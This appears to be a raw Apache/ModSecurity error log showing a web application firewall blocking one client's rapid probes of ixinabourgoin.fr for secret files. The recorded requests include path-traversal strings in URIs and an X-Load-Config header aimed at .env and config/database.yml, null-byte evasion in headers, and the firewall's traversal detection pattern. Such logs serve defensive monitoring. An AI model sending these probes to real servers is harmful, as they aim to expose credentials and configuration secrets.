[Tue May 12 05:10:32.267492 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOwAAAJY"]
[Tue May 12 05:10:32.267526 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOwAAAJY"]
[Tue May 12 05:10:32.267548 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOwAAAJY"]
[Tue May 12 05:10:32.267666 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.dev"] [unique_id "agKaKNr1yOh9TvizeziY1AAAAEQ"]
[Tue May 12 05:10:32.267705 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOwAAAJY"]
[Tue May 12 05:10:32.267753 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOwAAAJY"]
[Tue May 12 05:10:32.267778 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOwAAAJY"]
[Tue May 12 05:10:32.268088 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOwAAAJY"]
[Tue May 12 05:10:32.268289 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOwAAAJY"]
[Tue May 12 05:10:32.269538 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaKHo6NvB9WXx5V-6nMQAAARY"]
[Tue May 12 05:10:32.269684 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaKHo6NvB9WXx5V-6nMQAAARY"]
[Tue May 12 05:10:32.269863 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaKHo6NvB9WXx5V-6nMQAAARY"]
[Tue May 12 05:10:32.284532 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.example"] [unique_id "agKaKNr1yOh9TvizeziY1QAAAEQ"]
[Tue May 12 05:10:32.284703 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.example"] [unique_id "agKaKNr1yOh9TvizeziY1QAAAEQ"]
[Tue May 12 05:10:32.284915 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.example"] [unique_id "agKaKNr1yOh9TvizeziY1QAAAEQ"]
[Tue May 12 05:10:32.285127 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozPAAAAJY"]
[Tue May 12 05:10:32.285166 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozPAAAAJY"]
[Tue May 12 05:10:32.285188 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozPAAAAJY"]
[Tue May 12 05:10:32.285352 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozPAAAAJY"]
[Tue May 12 05:10:32.285379 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozPAAAAJY"]
[Tue May 12 05:10:32.285669 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozPAAAAJY"]
[Tue May 12 05:10:32.285855 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozPAAAAJY"]
[Tue May 12 05:10:32.287962 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKHo6NvB9WXx5V-6nMgAAARY"]
[Tue May 12 05:10:32.288024 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKHo6NvB9WXx5V-6nMgAAARY"]
[Tue May 12 05:10:32.288123 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKHo6NvB9WXx5V-6nMgAAARY"]
[Tue May 12 05:10:32.288303 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKHo6NvB9WXx5V-6nMgAAARY"]
[Tue May 12 05:10:32.301918 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/app/.env"] [unique_id "agKaKNr1yOh9TvizeziY1gAAAEQ"]
[Tue May 12 05:10:32.302087 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/app/.env"] [unique_id "agKaKNr1yOh9TvizeziY1gAAAEQ"]
[Tue May 12 05:10:32.302351 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/app/.env"] [unique_id "agKaKNr1yOh9TvizeziY1gAAAEQ"]
[Tue May 12 05:10:32.302649 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozPQAAAJY"]
[Tue May 12 05:10:32.302684 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozPQAAAJY"]
[Tue May 12 05:10:32.302706 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozPQAAAJY"]
[Tue May 12 05:10:32.303140 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozPQAAAJY"]
[Tue May 12 05:10:32.303332 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozPQAAAJY"]
[Tue May 12 05:10:32.306160 2026] [core:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] AH10244: invalid URI path (/css../../../.env)
[Tue May 12 05:10:32.319324 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/var/www/.env"] [unique_id "agKaKNr1yOh9TvizeziY1wAAAEQ"]
[Tue May 12 05:10:32.319483 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/var/www/.env"] [unique_id "agKaKNr1yOh9TvizeziY1wAAAEQ"]
[Tue May 12 05:10:32.319675 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/var/www/.env"] [unique_id "agKaKNr1yOh9TvizeziY1wAAAEQ"]
[Tue May 12 05:10:32.319832 2026] [core:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] AH10244: invalid URI path (/../../.env)
[Tue May 12 05:10:32.324562 2026] [core:error] [pid 1825287:tid 1825326] [client 45.148.10.246:21580] AH10244: invalid URI path (/css../../../../.env)
